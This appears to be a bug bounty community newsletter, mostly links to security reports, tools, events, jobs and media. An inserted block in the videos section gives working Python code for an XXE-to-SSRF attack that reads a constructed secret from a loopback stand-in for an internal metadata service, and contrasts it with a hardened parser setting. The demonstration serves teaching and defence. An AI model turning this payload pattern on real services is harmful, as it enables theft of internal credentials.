Hive Five 45 – The Alchemist

Hi friends,

Greetings from the hive!

I hope all is well. Last week, I read the following article, which made an impact on me: The Shortness of Life: Seneca on Busyness and the Art of Living Wide Rather Than Living Long.

Coincidentally, STÖK also mentioned that time is the most precious thing in life.

I'll most certainly be reading more about stoicism. What's been on your mind?

Let's take this week by swarm!

🐝 The Bee's Knees

  1. David reacting to himself finding an SSRF vulnerability in Google Cloud: The raw report he sent to the Google VRP team, with all additional comments.

  2. How to clean install macOS Big Sur and configure the operating system for privacy: In this episode, you explore how to clean install macOS Big Sur and configure the operating system for privacy.

  3. grimm-co / NotQuite0DayFriday: This repository documents real bugs in real software. At the time of disclosure, the most recent versions were patched. Looking at past mistakes is a useful way to spot trends in the bugs that make it past every quality-control process.

  4. Someone Made a Pirate Bay for NFTs: “Did you know that an NFT is just a hyperlink to an image that’s usually hosted on Google Drive or another web 2.0 host?”

  5. Degrees and Credentials in InfoSec: If you’re on InfoSec Twitter, you’ve probably seen the latest iteration of the never-ending debate around degrees, certs, and InfoSec.

🙏🏻 Enjoy This Newsletter?

  • Get $100 to try DigitalOcean. The go-to VPS for bug bounty hunters. I use it for all of my own recon and automation needs, plus it also doubles as a VPN. They have every cloud resource you need at an affordable price.

🔥 Buzzworthy

✅ Changelog

  1. Dalfox v2.6 release: Improved scan performance, more detail in the result/PoC output, and a new --poc-type flag.

  2. Damn Vulnerable DeFi V2 release: New testing env (Solidity 0.8 + Hardhat + Ethers), 4 new levels, new (broken) integrations with Uniswap v2, Gnosis Safe wallets, upgrades, timelocks, NFTs, and more.

  3. Blind SSRF Chains mod_proxy addition: The glossary has been updated with the Apache mod_proxy SSRF PoC, the affected versions, and a reference blog post.

  4. BBRF v1.2: The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices.

  5. Nuclei Templates v8.6.8: 48 New Templates, 10 Unique contributors, 2600+ Total number of templates.

📅 Events

  1. Yet Another Security: Introducing our line-up of speakers for YASCON TALKS. Live on Nov 28.

  2. DEFCAMP: conference - Nov 24-25 and hacking village - Nov 22-28.

  3. BSides Ahmedabad launching Swag Store: Be on the lookout for the exclusive merchandise, 50% of the proceeds of the swag sales will go to GiveIndia Covid Response Fund.

  4. InfoSec Black Friday Deals 2021: All the deals for InfoSec related software/tools this Black Friday / Cyber Monday.

🎉 Celebrate

  1. yan gave their first guest lecture at Stanford: Let's go!

  2. Farah was chilling at the Bugcrowd office: Awesome!

  3. bxmbn received a big bounty: They only started last year, on November 23rd. Congrats!

  4. Ahsan bought a new laptop with bug bounties: Well deserved!

  5. Canva Red Team scored a big bounty: They'll donate it to charity. Amazing!

💰 Career Corner

  1. OpenZeppelin is hiring (web3): Are you a developer who wants to get into web3? Or do you want to get paid to work on the most widely used open-source Solidity library?

  2. Cher evaluated the hiring process of different orgs: See what the process is like for people these days.

  3. Resources on cybersecurity career paths.

  4. Technical Project Manager at Bugcrowd: You will use your technical expertise to lead complex, multi-disciplinary projects from start to finish with our customers.

  5. 11/15/2021 Cybersecurity Job Thread: Includes remote and entry level, and intern positions.

📰 Articles

  1. Unauthenticated: Docker Edition: One of the goals with this series is to drive home the point that authentication (with properly implemented access controls) is essential to the security of your entire environment.

  2. Sharpening your Frida scripting skills with FridaLab: FridaLab is an Android application created specifically for honing Frida scripting skills on Android.

  3. 1 year anniversary of BugBountyHunter & our second Hackevent: The new dad life has been something interesting to adapt to, but zseano is loving every second of being a dad to his beautiful son.

  4. Todayisnew and Hx01 on Collaboration: Unless you’ve been living under a rock, Bugcrowd expanded our Collaboration feature this year.

  5. Hello World - From the Trenches: Cristi has no major life updates and no amazing achievements; just an ever growing love for life and simple living.

📚 Resources

  1. STÖK dipped his toe into web3 and DeFi: More info and resources in the replies.

  2. Favorite Offsec/Osint resources 2 by ΜΔDΞRΔS.

  3. Louis Nyffenegger asked: what's the best way you learn?

  4. Clone of the arsenal, armory & library by Maderas: Their personal InfoSec/OffSec/OSINT/Hacking resources list & Study Resource "The Arsenal, Armory & Library".

  5. Full Disclosure Mailing List: A public, vendor-neutral forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community.

🎥 Videos

  1. HackTheBox - BountyHunter.

  2. Testing Your Assumptions with Red Teaming.

  3. SecConf 2021 - Ruby on Rails security by Louis Nyffenegger: Those who don't know history are destined to repeat it.

  4. How to turn an XXE into an SSRF exploit: Learn how you can chain an XXE with an SSRF vulnerability to gain sensitive information.

  5. 8 Biggest Cyber Heists Ever Pulled Off: These days, you can rob a bank over the Internet, from the other side of the world.
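The XXE-to-SSRF chain from item 4 above, shown in working code as an added example (this is not code from the video or from the newsletter). It uses Python's standard xml.sax parser: when external general entities are enabled, expat resolves a SYSTEM entity by having urllib fetch the URL from the parser's host, so an attacker-supplied document can pull data from a service only that host can reach. The loopback HTTP server, the /latest/meta-data/token path and the secret it returns are constructed stand-ins for an internal endpoint; the hardened call is the same parse with the feature left off.

```python
import io
import threading
import urllib.request
import xml.sax
from http.server import BaseHTTPRequestHandler, HTTPServer
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed secret served by the stand-in internal service (not real data).
SECRET = "constructed-secret-token"

# Fetch directly rather than through any proxy the environment may configure,
# so the loopback request in this demo behaves the same everywhere.
urllib.request.install_opener(
    urllib.request.build_opener(urllib.request.ProxyHandler({}))
)


class _FakeInternalService(BaseHTTPRequestHandler):
    """Stand-in for an internal-only endpoint (e.g. a cloud metadata service)
    that the XML parser's host can reach but the attacker cannot."""

    def do_GET(self):
        body = SECRET.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_fake_service():
    """Bind a loopback HTTP server on a free port and serve it in a daemon thread."""
    srv = HTTPServer(("127.0.0.1", 0), _FakeInternalService)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def build_xxe_document(port):
    """Attacker-controlled XML: declares an external entity whose SYSTEM id is
    an internal URL, then references it inside an ordinary-looking element."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE order [\n"
        f'  <!ENTITY fetched SYSTEM "http://127.0.0.1:{port}/latest/meta-data/token">\n'
        "]>\n"
        "<order><note>&fetched;</note></order>\n"
    ).encode()


class _TextCollector(ContentHandler):
    """Collects character data, i.e. whatever the entity expanded to inside <note>."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_untrusted(xml_bytes, allow_external_entities):
    """Parse with xml.sax. With feature_external_ges on, expat asks the reader to
    resolve &fetched; and the reader opens the SYSTEM URL with urllib (the SSRF);
    with it off, the reference expands to nothing and no request is made."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, allow_external_entities)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts).strip()


if __name__ == "__main__":
    service = start_fake_service()
    doc = build_xxe_document(service.server_address[1])
    print("vulnerable parser returned:", repr(parse_untrusted(doc, True)))
    print("hardened parser returned:  ", repr(parse_untrusted(doc, False)))
    service.shutdown()
```

Python 3.7.1 and later leave external general entities off by default, so the vulnerable branch only happens when code opts in (or on older interpreters where it was the default); the defusedxml package is the usual drop-in when you also want DTDs and entity expansion refused outright. The same chain applies to any parser that resolves SYSTEM identifiers over the network.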

🎵 Audio

  1. Mac Power Users - The 2021 MPU Gift Guide: Believe it or not, it is time for the annual MPU Holiday Gift Guide once again.

  2. Cortex - State of the Apps 2022: Grey wants to talk about Focus, Myke is unhappy with communication, and they both discuss the tools and services they use for 'State of the Apps 2022'.

  3. IndieHackers podcast #231 – Learning from Conversations with Andrew Warner of Mixergy.

  4. The Alchemist: A Fable About Following Your Dream: I don't consume much fiction but thoroughly enjoyed this book.

